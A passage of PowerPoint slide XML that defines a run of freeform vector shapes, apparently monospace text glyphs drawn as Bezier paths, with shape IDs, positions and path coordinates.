                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 96 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 168 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 91 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 66 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 91 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="113" y="90"/>
                    <a:pt x="96" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="21" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="168" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="91" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="0"/>
                    <a:pt x="66" y="11"/>
                    <a:pt x="66" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="39"/>
                    <a:pt x="77" y="50"/>
                    <a:pt x="91" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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87" name="Freeform 928">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CE3AC6-06DD-46C5-9566-B626B0C96B6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId104"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1638301" y="2349501"/>
              <a:ext cx="71438" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 205 w 205"/>
                <a:gd name="T1" fmla="*/ 111 h 222"/>
                <a:gd name="T2" fmla="*/ 103 w 205"/>
                <a:gd name="T3" fmla="*/ 0 h 222"/>
                <a:gd name="T4" fmla="*/ 0 w 205"/>
                <a:gd name="T5" fmla="*/ 111 h 222"/>
                <a:gd name="T6" fmla="*/ 103 w 205"/>
                <a:gd name="T7" fmla="*/ 222 h 222"/>
                <a:gd name="T8" fmla="*/ 205 w 205"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 103 w 205"/>
                <a:gd name="T11" fmla="*/ 192 h 222"/>
                <a:gd name="T12" fmla="*/ 35 w 205"/>
                <a:gd name="T13" fmla="*/ 108 h 222"/>
                <a:gd name="T14" fmla="*/ 103 w 205"/>
                <a:gd name="T15" fmla="*/ 30 h 222"/>
                <a:gd name="T16" fmla="*/ 170 w 205"/>
                <a:gd name="T17" fmla="*/ 108 h 222"/>
                <a:gd name="T18" fmla="*/ 103 w 205"/>
                <a:gd name="T19" fmla="*/ 1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22">
                  <a:moveTo>
                    <a:pt x="205" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="49"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="103" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="175"/>
                    <a:pt x="48" y="222"/>
                    <a:pt x="103" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="222"/>
                    <a:pt x="205" y="174"/>
                    <a:pt x="205" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="103" y="192"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="192"/>
                    <a:pt x="35" y="154"/>
                    <a:pt x="35" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="63"/>
                    <a:pt x="67" y="30"/>
                    <a:pt x="103" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="30"/>
                    <a:pt x="170" y="63"/>
                    <a:pt x="170" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="154"/>
                    <a:pt x="139" y="192"/>
                    <a:pt x="103"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88" name="Freeform 929">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7A8181-2D71-4F40-A1BA-AE5ECBA4FF69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId105"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1720851" y="2349501"/>
              <a:ext cx="85725" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 250"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 250"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 250"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 250"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 250"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 250"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 250"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 250"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 250"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 250"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 100 w 250"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 120 w 250"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 250"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 140 w 250"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 250"/>
                <a:gd name="T33" fmla="*/ 75 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 250"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 250"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 250"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 250"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 250"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 250 w 250"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 250"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 250"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 250"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 143 w 250"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 250"/>
                <a:gd name="T55" fmla="*/ 2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0" h="218">
                  <a:moveTo>
                    <a:pt x="77" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="11"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="218"/>
                    <a:pt x="120" y="218"/>
                    <a:pt x="120" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="188"/>
                    <a:pt x="107" y="188"/>
                    <a:pt x="99" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="100"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="50"/>
                    <a:pt x="114" y="31"/>
                    <a:pt x="140" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="31"/>
                    <a:pt x="173" y="45"/>
                    <a:pt x="173" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="188"/>
                    <a:pt x="133" y="188"/>
                    <a:pt x="133" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="147" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="218"/>
                    <a:pt x="250" y="218"/>
                    <a:pt x="250" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="188"/>
                    <a:pt x="237" y="188"/>
                    <a:pt x="229" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="22"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="143" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="87" y="17"/>
                    <a:pt x="77" y="2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89" name="Freeform 930">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8BE4A4F-BBA7-42D7-9EE9-AE470D97FD95}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId106"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1830388" y="2317751"/>
              <a:ext cx="47625" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 135"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 135"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 135"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 135"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 135"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 39 w 135"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 135"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 135"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 135"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 135"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 135"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 135"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 127 w 135"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 135"/>
                <a:gd name="T27" fmla="*/ 2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147">
                  <a:moveTo>
                    <a:pt x="46" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="4"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="1" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="39" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="4"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="90" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="127" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="2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90" name="Freeform 931">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C0B64ED-CF2B-483F-9612-6A6B671DB0A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId107"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1933576" y="2351088"/>
              <a:ext cx="22225" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 32 h 215"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 63 h 215"/>
                <a:gd name="T8" fmla="*/ 63 w 63"/>
                <a:gd name="T9" fmla="*/ 32 h 215"/>
                <a:gd name="T10" fmla="*/ 63 w 63"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 32 w 63"/>
                <a:gd name="T13" fmla="*/ 153 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 63"/>
                <a:gd name="T15" fmla="*/ 184 h 215"/>
                <a:gd name="T16" fmla="*/ 31 w 63"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 63 w 63"/>
                <a:gd name="T19" fmla="*/ 1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15">
                  <a:moveTo>
                    <a:pt x="63" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="63" y="47"/>
                    <a:pt x="63" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="166"/>
                    <a:pt x="48" y="153"/>
                    <a:pt x="32" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="153"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="15" y="215"/>
                    <a:pt x="31" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="215"/>
                    <a:pt x="63" y="200"/>
                    <a:pt x="63" y="18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91" name="Freeform 932">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95850538-F4FE-4E0D-99D5-C570D1D3ADE4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId108"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2001838" y="2295526"/>
              <a:ext cx="61913" cy="174625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 105 w 177"/>
                <a:gd name="T1" fmla="*/ 67 h 499"/>
                <a:gd name="T2" fmla="*/ 172 w 177"/>
                <a:gd name="T3" fmla="*/ 11 h 499"/>
                <a:gd name="T4" fmla="*/ 177 w 177"/>
                <a:gd name="T5" fmla="*/ 6 h 499"/>
                <a:gd name="T6" fmla="*/ 167 w 177"/>
                <a:gd name="T7" fmla="*/ 0 h 499"/>
                <a:gd name="T8" fmla="*/ 72 w 177"/>
                <a:gd name="T9" fmla="*/ 63 h 499"/>
                <a:gd name="T10" fmla="*/ 72 w 177"/>
                <a:gd name="T11" fmla="*/ 176 h 499"/>
                <a:gd name="T12" fmla="*/ 52 w 177"/>
                <a:gd name="T13" fmla="*/ 228 h 499"/>
                <a:gd name="T14" fmla="*/ 4 w 177"/>
                <a:gd name="T15" fmla="*/ 244 h 499"/>
                <a:gd name="T16" fmla="*/ 0 w 177"/>
                <a:gd name="T17" fmla="*/ 250 h 499"/>
                <a:gd name="T18" fmla="*/ 8 w 177"/>
                <a:gd name="T19" fmla="*/ 255 h 499"/>
                <a:gd name="T20" fmla="*/ 70 w 177"/>
                <a:gd name="T21" fmla="*/ 299 h 499"/>
                <a:gd name="T22" fmla="*/ 72 w 177"/>
                <a:gd name="T23" fmla="*/ 324 h 499"/>
                <a:gd name="T24" fmla="*/ 72 w 177"/>
                <a:gd name="T25" fmla="*/ 423 h 499"/>
                <a:gd name="T26" fmla="*/ 96 w 177"/>
                <a:gd name="T27" fmla="*/ 478 h 499"/>
                <a:gd name="T28" fmla="*/ 167 w 177"/>
                <a:gd name="T29" fmla="*/ 499 h 499"/>
                <a:gd name="T30" fmla="*/ 177 w 177"/>
                <a:gd name="T31" fmla="*/ 493 h 499"/>
                <a:gd name="T32" fmla="*/ 169 w 177"/>
                <a:gd name="T33" fmla="*/ 488 h 499"/>
                <a:gd name="T34" fmla="*/ 107 w 177"/>
                <a:gd name="T35" fmla="*/ 445 h 499"/>
                <a:gd name="T36" fmla="*/ 105 w 177"/>
                <a:gd name="T37" fmla="*/ 421 h 499"/>
                <a:gd name="T38" fmla="*/ 105 w 177"/>
                <a:gd name="T39" fmla="*/ 316 h 499"/>
                <a:gd name="T40" fmla="*/ 85 w 177"/>
                <a:gd name="T41" fmla="*/ 269 h 499"/>
                <a:gd name="T42" fmla="*/ 46 w 177"/>
                <a:gd name="T43" fmla="*/ 250 h 499"/>
                <a:gd name="T44" fmla="*/ 105 w 177"/>
                <a:gd name="T45" fmla="*/ 186 h 499"/>
                <a:gd name="T46" fmla="*/ 105 w 177"/>
                <a:gd name="T47" fmla="*/ 67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7" h="499">
                  <a:moveTo>
                    <a:pt x="105" y="67"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="47"/>
                    <a:pt x="118" y="15"/>
                    <a:pt x="172" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="11"/>
                    <a:pt x="177" y="9"/>
                    <a:pt x="177" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="167" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="0"/>
                    <a:pt x="72" y="26"/>
                    <a:pt x="72" y="63"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="176"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="196"/>
                    <a:pt x="72" y="212"/>
                    <a:pt x="52" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="243"/>
                    <a:pt x="15" y="244"/>
                    <a:pt x="4" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="245"/>
                    <a:pt x="0" y="247"/>
                    <a:pt x="0" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="255"/>
                    <a:pt x="3" y="255"/>
                    <a:pt x="8" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="257"/>
                    <a:pt x="65" y="275"/>
                    <a:pt x="70" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="305"/>
                    <a:pt x="72" y="306"/>
                    <a:pt x="72" y="324"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="423"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="444"/>
                    <a:pt x="72" y="459"/>
                    <a:pt x="96" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="493"/>
                    <a:pt x="148" y="499"/>
                    <a:pt x="167" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="499"/>
                    <a:pt x="177" y="499"/>
                    <a:pt x="177" y="493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="488"/>
                    <a:pt x="174" y="488"/>
                    <a:pt x="169" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="486"/>
                    <a:pt x="113" y="470"/>
                    <a:pt x="107" y="445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="440"/>
                    <a:pt x="105" y="439"/>
                    <a:pt x="105" y="421"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="316"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="293"/>
                    <a:pt x="101" y="285"/>
                    <a:pt x="85" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="259"/>
                    <a:pt x="60" y="254"/>
                    <a:pt x="46" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="238"/>
                    <a:pt x="105" y="215"/>
                    <a:pt x="105" y="186"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="6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92" name="Freeform 933">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
